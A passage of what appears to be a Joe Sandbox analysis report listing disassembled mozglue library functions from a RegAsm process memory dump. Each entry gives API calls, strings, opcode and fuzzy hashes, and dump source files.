                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                    • API String ID: 1980384892-344433685
                                                                                    • Opcode ID: 81d322c84b66e8532b1bfacc6c29656b4358e94f51c27c47a8eaaa507bc31bb7
                                                                                    • Instruction ID: 0fb006274e641b137bf68fce6905b2f97353d896978d698d52049948bcd09adc
                                                                                    • Opcode Fuzzy Hash: 81d322c84b66e8532b1bfacc6c29656b4358e94f51c27c47a8eaaa507bc31bb7
                                                                                    • Instruction Fuzzy Hash: E9510171E052188BDB00DF68C8426EEB7F0EF5A358F04842DE8556B741E730A989C7EB
                                                                                    Function 6C73A520 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C73A565
                                                                                      • Part of subcall function 6C73A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A4BE
                                                                                      • Part of subcall function 6C73A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C73A4D6
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C73A65B
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C73A6B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                    • String ID: 0$z
                                                                                    • API String ID: 310210123-2584888582
                                                                                    • Opcode ID: 6af208276d9daad829f9495ea0690de8443ec4c5a5fd384e0b949efa6d9e5a01
                                                                                    • Instruction ID: ac6873dc3ff4a9e8bd673f330469c39a64385e16bfc21c4e11b86ab3e268a377
                                                                                    • Opcode Fuzzy Hash: 6af208276d9daad829f9495ea0690de8443ec4c5a5fd384e0b949efa6d9e5a01
                                                                                    • Instruction Fuzzy Hash: EA414771A08745DFC741DF28C080A9BBBE5BF89354F409A2EF49987651EB30E549CB83
                                                                                    Function 6C6C78C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7B89
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7BAC
                                                                                      • Part of subcall function 6C6C78C0: free.MOZGLUE(?,6C74008B), ref: 6C6C7BCF
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7BF2
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                    • String ID:
                                                                                    • API String ID: 3977402767-0
                                                                                    • Opcode ID: b4d6034e32a1f04dba8e311a155b7367edfa8b5a5c2e0414825c00c6c64aa934
                                                                                    • Instruction ID: 39109fef0bb5167b26b3eb41e6dd589597eac2570e95687e1c98ba8fbb46e1b6
                                                                                    • Opcode Fuzzy Hash: b4d6034e32a1f04dba8e311a155b7367edfa8b5a5c2e0414825c00c6c64aa934
                                                                                    • Instruction Fuzzy Hash: D5C19531F011188BEB248B68CC90BDDB7B2EF41318F1543A9D51AA7BC1D731AE858F5A
                                                                                    Function 6C709420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C70946B
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C709459
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C70947D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                    • API String ID: 4042361484-1628757462
                                                                                    • Opcode ID: 10e3591c2ff1d90fa00dfb75ea5111442733e4ded0c8305b628d6a2cc9420bce
                                                                                    • Instruction ID: facb988fc142b7d264b10e87858d2f1d9df4c6e72f0fee8a6b7bd3442cb6a2e7
                                                                                    • Opcode Fuzzy Hash: 10e3591c2ff1d90fa00dfb75ea5111442733e4ded0c8305b628d6a2cc9420bce
                                                                                    • Instruction Fuzzy Hash: 0201D4B0B0010187D710BBACDE11A5733F5AB0637EF058537F92A86B51EA31E9698A5B
                                                                                    Function 6C710F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710F6B
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C710F88
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710FF7
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C711067
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7110A7
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C71114B
                                                                                      • Part of subcall function 6C708AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C721563), ref: 6C708BD5
                                                                                    • free.MOZGLUE(?), ref: 6C711174
                                                                                    • free.MOZGLUE(?), ref: 6C711186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                    • String ID:
                                                                                    • API String ID: 2803333873-0
                                                                                    • Opcode ID: 045ae78a319b1adf2e66128807d29f986d4c708f1bd8837089a66281241a7c26
                                                                                    • Instruction ID: 828a74311b3306180e88f1b2284eb4147773e557c4c08759e4a640388864826d
                                                                                    • Opcode Fuzzy Hash: 045ae78a319b1adf2e66128807d29f986d4c708f1bd8837089a66281241a7c26
                                                                                    • Instruction Fuzzy Hash: 55610775A083448FCB10DF25CA8879AB7F5BFD5318F08892DE89947B11EB31E449CB41
                                                                                    Function 6C6CE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6C6D1999), ref: 6C6CEA39
                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C6CEA5C
                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C6CEA76
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6C6D1999), ref: 6C6CEA9D
                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C6D1999), ref: 6C6CEAC2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C6CEADC
                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C6CEB0B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C6CEB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 706364981-0
                                                                                    • Opcode ID: 3264a240e754e35a60ce86c2094059bf8c7255f1ab4f08cd6840419b1a73f060
                                                                                    • Instruction ID: dc29a9a766a99431cba0248a7c063fcae1f662c01b7481d256c44f08bcdb1ab6
                                                                                    • Opcode Fuzzy Hash: 3264a240e754e35a60ce86c2094059bf8c7255f1ab4f08cd6840419b1a73f060
                                                                                    • Instruction Fuzzy Hash: 7441F7B1A002259FDB14CFA8CC85AAE77B4FF55358F240629E815DB794E730EA04C7DA
                                                                                    Function 6C6CB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6AC
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6D1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6E3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB70B
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB71D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C6CB61E), ref: 6C6CB73F
                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB760
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1394714614-0
                                                                                    • Opcode ID: 895619489ffa1f42e80b7baba8e3748bb0b338832fa2e9257a17c3502b78bcbe
                                                                                    • Instruction ID: f580b6f230f0940ba4dc1eab0e31ae6e430072d48255c1d60596c08ece28c6e6
                                                                                    • Opcode Fuzzy Hash: 895619489ffa1f42e80b7baba8e3748bb0b338832fa2e9257a17c3502b78bcbe
                                                                                    • Instruction Fuzzy Hash: 8141B6B2E001259FCB04DF68DC445AEB7B5FB85324F250669E825E7780D731A91487E6
                                                                                    Function 6C6CEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(6C745104), ref: 6C6CEFAC
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CEFD7
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6CEFEC
                                                                                    • free.MOZGLUE(?), ref: 6C6CF00C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CF02E
                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C6CF041
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CF065
                                                                                    • moz_xmalloc.MOZGLUE ref: 6C6CF072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 1148890222-0
                                                                                    • Opcode ID: cfc4cc09cb737282d68313a7a5795b1e2f095bb1c4eb13743921b18955cbeee3
                                                                                    • Instruction ID: 0527657a363f75e0e66b95967c99d1b8cdd16ae7d407dc8bf92d4adfb45dd790
                                                                                    • Opcode Fuzzy Hash: cfc4cc09cb737282d68313a7a5795b1e2f095bb1c4eb13743921b18955cbeee3
                                                                                    • Instruction Fuzzy Hash: DA4116B1B002159FCB08CF68DC959AE7365FF85318B24022DE826CB794EB31E905C7E6
                                                                                    Function 6C73B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C73B5B9
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C73B5C5
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C73B5DA
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C73B5F4
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C73B605
                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C73B61F
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C73B631
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C73B655
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 1276798925-0
                                                                                    • Opcode ID: 1ed4545835cf012ff2c4438d02a26028d399bcd53efecbc8c26856b869fe0a80
                                                                                    • Instruction ID: 08809304caabb07c25c5e5e15466e39d90c50069e56cc8db4b767e8534004ebe
                                                                                    • Opcode Fuzzy Hash: 1ed4545835cf012ff2c4438d02a26028d399bcd53efecbc8c26856b869fe0a80
                                                                                    • Instruction Fuzzy Hash: 2231F571B00514CBCB00EF68C9598AEB7B5FF8A329B144576D91697741DB30BD06CF91
                                                                                    Function 6C706590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FFA80: GetCurrentThreadId.KERNEL32 ref: 6C6FFA8D
                                                                                      • Part of subcall function 6C6FFA80: AcquireSRWLockExclusive.KERNEL32(6C74F448), ref: 6C6FFA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C706727
                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7067C8
                                                                                      • Part of subcall function 6C714290: memcpy.VCRUNTIME140(?,?,6C722003,6C720AD9,?,6C720AD9,00000000,?,6C720AD9,?,00000004,?,6C721A62,?,6C722003,?), ref: 6C7142C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                    • String ID: data$vtl
                                                                                    • API String ID: 511789754-1574058162
                                                                                    • Opcode ID: 79d272ac9644d47cabfbebae3eaee25bc77c6f6dafe97bd77b1a534f1369f29c
                                                                                    • Instruction ID: d6b9a985822f43a77321c9e8fc437db2272def4701abab05f21ebda7ab9899d6
                                                                                    • Opcode Fuzzy Hash: 79d272ac9644d47cabfbebae3eaee25bc77c6f6dafe97bd77b1a534f1369f29c
                                                                                    • Instruction Fuzzy Hash: DFD1DFB5B083408FD720DF24C955B9FB7E5AFD5308F10892DE48987B91EB30A949CB92
                                                                                    Function 6C6FD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C6CEB57,?,?,?,?,?,?,?,?,?), ref: 6C6FD652
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6CEB57,?), ref: 6C6FD660
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6CEB57,?), ref: 6C6FD673
                                                                                    • free.MOZGLUE(?), ref: 6C6FD888
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                    • String ID: Wll$|Enabled
                                                                                    • API String ID: 4142949111-1183618018
                                                                                    • Opcode ID: 381ca74e2798863b89f969f2da89a696f6284403f336ddb5d073c85613e2aa8e
                                                                                    • Instruction ID: 499a28991ecc8356eca8b15e2502876c6e39058d148106323ecd434c681e3ee6
                                                                                    • Opcode Fuzzy Hash: 381ca74e2798863b89f969f2da89a696f6284403f336ddb5d073c85613e2aa8e
                                                                                    • Instruction Fuzzy Hash: E0A10570A043189FDB11CF69C4907EEBBF2AF4A318F14805DD8A9AB741C731B946CBA5
                                                                                    Function 6C6D9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,?,6C727ABE), ref: 6C6D985B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C727ABE), ref: 6C6D98A8
                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C6D9909
                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C6D9918
                                                                                    • free.MOZGLUE(?), ref: 6C6D9975
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1281542009-0
                                                                                    • Opcode ID: fee08c2c787e9128d957709bdbdc02baa129f86c45fe84084b84f7c27e8e206a
                                                                                    • Instruction ID: 1c5049d60cd86e059b1d135803946cf929b5f361518200ec2e707ce873ea2f36
                                                                                    • Opcode Fuzzy Hash: fee08c2c787e9128d957709bdbdc02baa129f86c45fe84084b84f7c27e8e206a
                                                                                    • Instruction Fuzzy Hash: 59718B756047058FC725CF28C490956B7F1FF4A3287294AADE85A8BB90DB31F841CF95
                                                                                    Function 6C6DB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB7E6
                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB80C
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE), ref: 6C6DB88E
                                                                                    • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C71CC83,?,?,?,?,?,?,?,?,?,6C71BCAE,?,?,6C70DC2C), ref: 6C6DB896
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
                                                                                    • String ID:
                                                                                    • API String ID: 922945588-0
                                                                                    • Opcode ID: 4197a2779011ad0147c56b0c1b2678a0a80183e78612a85210c5b5e2086081a2
                                                                                    • Instruction ID: 2c95d064d365caee1545f6d19b4151b4da49950ff0525bf525f710ff9a92a872
                                                                                    • Opcode Fuzzy Hash: 4197a2779011ad0147c56b0c1b2678a0a80183e78612a85210c5b5e2086081a2
